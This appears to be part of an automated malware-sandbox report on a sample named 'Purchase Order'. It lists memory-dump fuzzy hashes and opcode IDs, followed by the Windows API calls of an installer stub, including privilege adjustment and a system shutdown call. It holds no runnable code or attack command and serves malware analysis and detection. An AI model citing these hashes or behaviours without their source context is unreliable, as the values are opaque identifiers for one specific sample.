                                                                                                  • Opcode ID: e6af2e118bd57d76d085096dbb9798acbe98e2036efe4b66cacb16dd45317e6f
                                                                                                  • Instruction ID: 44228bde3656f92bd1559e2f83bdb33be83d180c9484670526b516a74f378371
                                                                                                  • Opcode Fuzzy Hash: e6af2e118bd57d76d085096dbb9798acbe98e2036efe4b66cacb16dd45317e6f
                                                                                                  • Instruction Fuzzy Hash: 1531AF78E51308CFDB48DFA8D59499DBBB2FF49304B208469E819AB364DB35AD42CF41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b20f5345fbfa9822ba897fae811ce2a4c06d0caeba24a26eedf184b5717d7de0
                                                                                                  • Instruction ID: 0669d9da3d57b7298643d8b0134086450185b34a391d1821b664a108e172a219
                                                                                                  • Opcode Fuzzy Hash: b20f5345fbfa9822ba897fae811ce2a4c06d0caeba24a26eedf184b5717d7de0
                                                                                                  • Instruction Fuzzy Hash: 0C21F3B5D012199FCB10CFA9D485ADEFBF4EF48720F14806AE808AB354D774AA44CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 385df7103061b73d0a860876746892dd524f59481f3029b3f73d3cb3e991279d
                                                                                                  • Instruction ID: 576d230905e08cd5a09681bd85a89ddea1feed429e509586f8c1669a165c977b
                                                                                                  • Opcode Fuzzy Hash: 385df7103061b73d0a860876746892dd524f59481f3029b3f73d3cb3e991279d
                                                                                                  • Instruction Fuzzy Hash: 0811AC353456008FCB04DB28D994A56BBFAEF89765B1185AAEA49CF371CE70EC05CB60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c5d4a5a4f7ffcbdcc3e9bc42a286b745dc8ba0899a5d113bcfe81de421ceeca0
                                                                                                  • Instruction ID: 75d6ec46101935d2ab9784d5f517b298aa51adc3b8bdc21c97395b34c4d45daf
                                                                                                  • Opcode Fuzzy Hash: c5d4a5a4f7ffcbdcc3e9bc42a286b745dc8ba0899a5d113bcfe81de421ceeca0
                                                                                                  • Instruction Fuzzy Hash: F4113D74E052098FEB44DBA8D884ADDBBB9BF88719F54C265E814AB246DB30ED41CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3636d8ee31864b9ea774be8cfe7a59f03a66f5449a2480b5327560e014871e4
                                                                                                  • Instruction ID: 6cfb83c4611a803d2e029473efa3e350df5f0194c9d797e0e6507f69f84d6f47
                                                                                                  • Opcode Fuzzy Hash: a3636d8ee31864b9ea774be8cfe7a59f03a66f5449a2480b5327560e014871e4
                                                                                                  • Instruction Fuzzy Hash: 8A214C74D402099FDB05DFA8D941B9EBFF5FF45300F1085B9D004AB265E7789A4ACB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8032cd487d15c184d2126d5721990b377c3b9edac6674e4433816117eb10a9ca
                                                                                                  • Instruction ID: 878da90dd252875109135627551ed52faf0cf371dfe3c5b5c40f0cbf99cde12c
                                                                                                  • Opcode Fuzzy Hash: 8032cd487d15c184d2126d5721990b377c3b9edac6674e4433816117eb10a9ca
                                                                                                  • Instruction Fuzzy Hash: 16115E75B00104DFDB189F65D894BEEBBB6BB8C710F104529E915E7290DB719C90CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 04eae2a214836ec70a7c973a485e546c798836c2cb511ebe0517b21b44a4edaa
                                                                                                  • Instruction ID: 624255a2c734c4d933376941384837b1a515ecf7f6d74d5bafc84aaf0432f2b6
                                                                                                  • Opcode Fuzzy Hash: 04eae2a214836ec70a7c973a485e546c798836c2cb511ebe0517b21b44a4edaa
                                                                                                  • Instruction Fuzzy Hash: 8311E5313086128FC7195B2AD8A496AB7A6BF8A7613150079F506DB3A0DF72DC4287D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 902a0df37d3c9c35340be77f7d3b3a67a4dad6d233e218edfb90b6bf27f846b9
                                                                                                  • Instruction ID: 21bbe7182413260e1db17e87de38c0c42c7d5f3d1678f633aaf205becf970b46
                                                                                                  • Opcode Fuzzy Hash: 902a0df37d3c9c35340be77f7d3b3a67a4dad6d233e218edfb90b6bf27f846b9
                                                                                                  • Instruction Fuzzy Hash: D1114C31E013158BCF50EFB8849469EBFFAAB88A50B454639D804AB201DB31D8528BE1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: eca6c33678649da4d7aa48e421181da6682565415477f9d505ed73788669c5cc
                                                                                                  • Instruction ID: b54d60f59f99455761644f37977d9cd2ef046cb4d92c8a2a0c7dfae32d0a61dc
                                                                                                  • Opcode Fuzzy Hash: eca6c33678649da4d7aa48e421181da6682565415477f9d505ed73788669c5cc
                                                                                                  • Instruction Fuzzy Hash: 7E21C074D0520A8FCB45EFA9D8445EEBFF4FF4A310F1052AAD805B7220EB355A95CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f3ff73c231ea5adab487cc57ecea0b31111d0ab5242afbd2996e535d33d6af5f
                                                                                                  • Instruction ID: c4879e86374f7f2a3935971871448606025e45db6ef2f6e05d5ba0fbda7ccc44
                                                                                                  • Opcode Fuzzy Hash: f3ff73c231ea5adab487cc57ecea0b31111d0ab5242afbd2996e535d33d6af5f
                                                                                                  • Instruction Fuzzy Hash: B31114B6800249DFDB10DF9AD844BDEBBF4EF48320F148419E918A7251C379A950DFA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8a15a3e38772dd38268338b742b106fcfb3f82c017daafdb2401c6d9f51129a3
                                                                                                  • Instruction ID: c6e69bde17ed9f99ffa3e2949dc364c439af170bd0437c8f150a2124ca8dc592
                                                                                                  • Opcode Fuzzy Hash: 8a15a3e38772dd38268338b742b106fcfb3f82c017daafdb2401c6d9f51129a3
                                                                                                  • Instruction Fuzzy Hash: 0C112C74D401099FDB09EFA8D941B9EBFF5FB45301F108579D014AB265EB789A4ACB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e575da8404420779a04911722a82c73587e4c0932614236cf5693463e694c822
                                                                                                  • Instruction ID: 5a4590c2bc0a8941ad4a26c8c9903e246e6f39183b243e4b8a6102dfc9e5488a
                                                                                                  • Opcode Fuzzy Hash: e575da8404420779a04911722a82c73587e4c0932614236cf5693463e694c822
                                                                                                  • Instruction Fuzzy Hash: 5111F774E012498FEB10DFF8E850BDEBBB1BF48355F409461E908AB346EA309A428F51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360268271.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ad000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d146c012d62b50799e69983f9b519668de3e8daf9b392618dad8028a3e4e9ddc
                                                                                                  • Instruction ID: 69eac0242f0e16fdb951f769fe1d3100f062aa00d7f2425ea48cc3545ecabb91
                                                                                                  • Opcode Fuzzy Hash: d146c012d62b50799e69983f9b519668de3e8daf9b392618dad8028a3e4e9ddc
                                                                                                  • Instruction Fuzzy Hash: 6311D075504244DFCB11CF50C5C4B15BFA2FB49314F24CAAEE94A4B652C33AD84ACF62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ba6a735ac6b3a3e728a409bb896186a8ac7b8e56b2850215952296fba554e0b5
                                                                                                  • Instruction ID: bd9d8eee5342a1c16fa1e2cc52de4e36d887829570d375027957b5d48c787a7b
                                                                                                  • Opcode Fuzzy Hash: ba6a735ac6b3a3e728a409bb896186a8ac7b8e56b2850215952296fba554e0b5
                                                                                                  • Instruction Fuzzy Hash: 04111FB6800249EFDB10CF99D844BEEBBF5EF48320F148429E658A7250C339A590DFA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ad1b8316fb1b1cbae335217ad972ef919e4084225234ea1d0bf339b037fd20b8
                                                                                                  • Instruction ID: b247a5f78c4af6d336851080ffececa802474a3c94ec5985c7f17b2c12333de8
                                                                                                  • Opcode Fuzzy Hash: ad1b8316fb1b1cbae335217ad972ef919e4084225234ea1d0bf339b037fd20b8
                                                                                                  • Instruction Fuzzy Hash: 5C0147327081486FCB158F599C10AEF3BA7DBC9750F198036FA04C7281EB728D4197D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cf6c1a4b61f42f24e80e7d53bb7fe42be416941b9cc42fa215f4148009e96705
                                                                                                  • Instruction ID: 796bf94ad711f5e56a67584bf807f234db4f5ebb06d0b72a60095d1bcac978e6
                                                                                                  • Opcode Fuzzy Hash: cf6c1a4b61f42f24e80e7d53bb7fe42be416941b9cc42fa215f4148009e96705
                                                                                                  • Instruction Fuzzy Hash: 800180B5904248AFDB12DF79DC449AE7FB4EF89361F004129EC56E7211CA304962CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dd3c90cf1701ab4a8dcff5c3f79793e9d9b636764417ab8b430bc0009a002839
                                                                                                  • Instruction ID: fdb315246157c25ae7658dcb20a06243750b044e1310a2e14d01a344d9dba188
                                                                                                  • Opcode Fuzzy Hash: dd3c90cf1701ab4a8dcff5c3f79793e9d9b636764417ab8b430bc0009a002839
                                                                                                  • Instruction Fuzzy Hash: 47012434A0C3C41FDB02577868244AE7FEA9FCB211B1482EBE546CB6A3CA258856C712
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 274be89310a89d754bb825816a227ecbd53bf75158414936d37926ff854d658e
                                                                                                  • Instruction ID: 5c9b6bd15511be532e3a704cfdc0c5d8cd385bae6fc35ba71d31aad4da21d124
                                                                                                  • Opcode Fuzzy Hash: 274be89310a89d754bb825816a227ecbd53bf75158414936d37926ff854d658e
                                                                                                  • Instruction Fuzzy Hash: 1E014C353016009FDB149B29D585A56B7E9EF88B65F10856AEA098F361CEB0EC04CB60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1d12941e0a8c12f85a220483e814a1cf71cdc1ef77e58f6f4f2c75fcca984387
                                                                                                  • Instruction ID: bca9203a9bbd9d380e6b22e513d4d5c41734209f09b5e4daaa795a771b563400
                                                                                                  • Opcode Fuzzy Hash: 1d12941e0a8c12f85a220483e814a1cf71cdc1ef77e58f6f4f2c75fcca984387
                                                                                                  • Instruction Fuzzy Hash: 21018075A002099BCF10DFB9D8485AE7BB9EF88350F004029ED16E7250DA309911CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f62cc0a636961be24c4b74fe528866befab6efc09771bff392b193f5194a739e
                                                                                                  • Instruction ID: 8aaa187db98182c38b0588b7e896a1fb69d4097b6a779d90087f4955d0d0e8a0
                                                                                                  • Opcode Fuzzy Hash: f62cc0a636961be24c4b74fe528866befab6efc09771bff392b193f5194a739e
                                                                                                  • Instruction Fuzzy Hash: 6D114078D00209AFDB01CFA8D845AAEBFB1FF49300F104565D914B7750E7395A56DF91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4f26a608b0d040c933e5d2a0ce9d52e39ab5907651d94fea388d5a9edcf53325
                                                                                                  • Instruction ID: 3cda34f52bf1992fa633c27b0b5b5bc4f48a534a321b7ccb1cdf1f9e55ddec84
                                                                                                  • Opcode Fuzzy Hash: 4f26a608b0d040c933e5d2a0ce9d52e39ab5907651d94fea388d5a9edcf53325
                                                                                                  • Instruction Fuzzy Hash: F1F0F636B097505FDB168779A41096EBFE9CFC566171441AFD405CB2A1CE71CC02C790
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 401eb217d1f89e9345c145eabda959217a429ad3ee0349c1b7585f25152437dd
                                                                                                  • Instruction ID: 2d10603b2dde994cc192c8090b9a3702abdd825915768e770a5d17102f042957
                                                                                                  • Opcode Fuzzy Hash: 401eb217d1f89e9345c145eabda959217a429ad3ee0349c1b7585f25152437dd
                                                                                                  • Instruction Fuzzy Hash: D4F0C2326002156FCF069EA898119EF3FFAEF89360B10402AF908D7211DE35881297A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bb7a24609c4a01651cd592b2c24bdd9abf61e0174c3a717d08bfb1ca13fe35ee
                                                                                                  • Instruction ID: b67dabcc46613aa9b70e80a5eef8f0b9e5bf5e94db235004ea85fef633f9045f
                                                                                                  • Opcode Fuzzy Hash: bb7a24609c4a01651cd592b2c24bdd9abf61e0174c3a717d08bfb1ca13fe35ee
                                                                                                  • Instruction Fuzzy Hash: E1F0F672D002089F8B14DFA9D8809DFBFFAFF98360B00062AD505D7611EB305945CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4c31b7a701bfa20ca331c0c45b39e9560ad02c94cfec8221911e274e0b66c793
                                                                                                  • Instruction ID: 2fc9f394b6e24c1f2c603f44950cf6931b86a6156dda1cd5594fb30fc43b3b63
                                                                                                  • Opcode Fuzzy Hash: 4c31b7a701bfa20ca331c0c45b39e9560ad02c94cfec8221911e274e0b66c793
                                                                                                  • Instruction Fuzzy Hash: 2901C9B8D00209EFDB44DFA9D9416AEFBF1FF48300F50816A9818A3350EB759A16DB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7a60600f3a0a352033736eca4d8a47ccc641fd4415f28abece061764719c651e
                                                                                                  • Instruction ID: eac10a86b36b8e4e27dd9d31f843819c0e385be1de1b48d7dd573b52ecff6a0c
                                                                                                  • Opcode Fuzzy Hash: 7a60600f3a0a352033736eca4d8a47ccc641fd4415f28abece061764719c651e
                                                                                                  • Instruction Fuzzy Hash: 72F03A353012059FC700DF59D888C5ABBEAFF88765B548169E909CB330CB71AC52CB40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3247fdcdf1be117a6fa8fa5779c9a7f2ecf76b2f151bf2022e207f879c48bbe5
                                                                                                  • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                                  • Opcode Fuzzy Hash: 3247fdcdf1be117a6fa8fa5779c9a7f2ecf76b2f151bf2022e207f879c48bbe5
                                                                                                  • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a9fb68d094d31675649b07d6254f40c74a21512cb2b5d50ac1378e148adc1705
                                                                                                  • Instruction ID: f813b44840623955f7091423728cf0b8d6c721a105d416384cf5fab6ff712d96
                                                                                                  • Opcode Fuzzy Hash: a9fb68d094d31675649b07d6254f40c74a21512cb2b5d50ac1378e148adc1705
                                                                                                  • Instruction Fuzzy Hash: 1ED05B35D6022BD6CB21EBA1EC100DDB334EED5265B548617D53837190EB34275EC6A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                  • Instruction ID: d07d0420a0f5e8efa5593a08324df4b5053c913cc17ffe17fcb906d6d069460e
                                                                                                  • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                  • Instruction Fuzzy Hash: 1BC0127320C1282AA22C504EBC41EE7BA8CD2C13B8A220137F96C8320098429C8011E9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 39b1e3c5f379463b570b1849ab7bb515b6066213899e1f7815213638fdd9be58
                                                                                                  • Instruction ID: 0e4ef17bbe797697c045b1a24606935c67a4e486c731f157a1ad024daa5b29eb
                                                                                                  • Opcode Fuzzy Hash: 39b1e3c5f379463b570b1849ab7bb515b6066213899e1f7815213638fdd9be58
                                                                                                  • Instruction Fuzzy Hash: C9D0C7363142146B4B055E9D94048AE7F6EDBC97717048026F909D7310CE714D5397D5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 92859317bb0d0f3c529113ae272ffcaf5d3b1ca7a6cf95dbb0f3b23422a833fa
                                                                                                  • Instruction ID: dde5a54617666184b0828177350573c5de04c3b16e3344983b04e61c29484fb7
                                                                                                  • Opcode Fuzzy Hash: 92859317bb0d0f3c529113ae272ffcaf5d3b1ca7a6cf95dbb0f3b23422a833fa
                                                                                                  • Instruction Fuzzy Hash: A6D0677AB40018DFCB049F99EC408DDBB76FB98221B048516E925A3261C6319961DBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3b039cab100b61ace154ccec6d80190979f86137f9b945032200beb53745075e
                                                                                                  • Instruction ID: ce916d75f118fb57dff1c8b8a077ee088cb622f4479da6342531e6d5c0551bac
                                                                                                  • Opcode Fuzzy Hash: 3b039cab100b61ace154ccec6d80190979f86137f9b945032200beb53745075e
                                                                                                  • Instruction Fuzzy Hash: 1BC012341883094FD589EF6EFD46B557B6EEB802047504931A1064757EEFBC594A86D0
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNEL32 ref: 004032E4
                                                                                                  • GetVersion.KERNEL32 ref: 004032EA
                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403313
                                                                                                  • #17.COMCTL32(00000007,00000009), ref: 00403335
                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040333C
                                                                                                  • SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 00403358
                                                                                                  • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040336D
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 00403380
                                                                                                  • CharNextA.USER32(00000000,00429000,00000020), ref: 004033AB
                                                                                                  • GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 004034A8
                                                                                                  • GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 004034B9
                                                                                                  • lstrcatA.KERNEL32(0042A400,\Temp), ref: 004034C5
                                                                                                  • GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 004034D9
                                                                                                  • lstrcatA.KERNEL32(0042A400,Low), ref: 004034E1
                                                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 004034F2
                                                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 004034FA
                                                                                                  • DeleteFileA.KERNEL32(0042A000), ref: 0040350E
                                                                                                    • Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
                                                                                                    • Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD
                                                                                                  • OleUninitialize.OLE32(?), ref: 004035BC
                                                                                                  • ExitProcess.KERNEL32 ref: 004035DD
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FA
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403701
                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403719
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403738
                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040375C
